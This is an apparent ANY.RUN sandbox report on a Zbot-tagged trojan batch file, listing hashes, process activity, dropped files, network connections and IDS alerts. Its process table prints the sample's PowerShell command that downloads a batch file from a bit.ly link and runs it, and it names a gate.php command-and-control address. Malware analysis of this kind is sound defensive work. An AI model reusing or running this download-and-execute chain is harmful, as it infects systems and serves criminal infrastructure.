analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

CA.586094849056.bat

Full analysis: https://app.any.run/tasks/ed53be6a-28f3-46a7-9c85-9ad72391d54f
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 08, 2018, 19:08:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
zbot
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5:

8E5AFA5581BA170CD5AC0D13286C3357

SHA1:

70D9DAA585FDE1D17B357899E9AE4374FD6D0287

SHA256:

B7F5319817FE985295A7639A9CDFF79914B6BB9C1A2067136004E195FCAC859D

SSDEEP:

6:h6I3SsKbYyriPUsriWwa+5AQ9n7fu0ztG/jPW/Hc/5yWAHc/0:YI3SZbYIg2t9nbuwtwrm85rA80

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2196)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2196)
      • cmd.exe (PID: 3388)
    • Application launched itself

      • cmd.exe (PID: 2196)
    • Creates files in the user directory

      • powershell.exe (PID: 3352)
  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 3352)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3388cmd /c ""C:\Users\admin\AppData\Local\Temp\CA.586094849056.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2196C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\CA.586094849056.bat" C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3352powershell.exe (new-object system.net.webclient).downloadfile('https://bit.ly/2F93YEq', 'C:\Users\admin\AppData\Roaming\ppc.bat')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2080C:\Windows\system32\cmd.exe /K C:\Users\admin\AppData\Roaming\ppc.batC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3221225786
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
303
Read events
226
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RAE17LHA0EODRXPEAVG3.temp
MD5:
SHA256:
3352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF182d16.TMPbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
3352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3352
powershell.exe
GET
200
185.209.21.103:80
http://185.209.21.103/w1/gate.php
NL
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3352
powershell.exe
67.199.248.10:443
bit.ly
Bitly Inc
US
shared
3352
powershell.exe
185.209.21.103:80
NovoServe B.V.
NL
suspicious

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared

Threats

PID
Process
Class
Message
3352
powershell.exe
A Network Trojan was detected
ET TROJAN Generic gate[.].php GET with minimal headers
3352
powershell.exe
A Network Trojan was detected
ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad
No debug info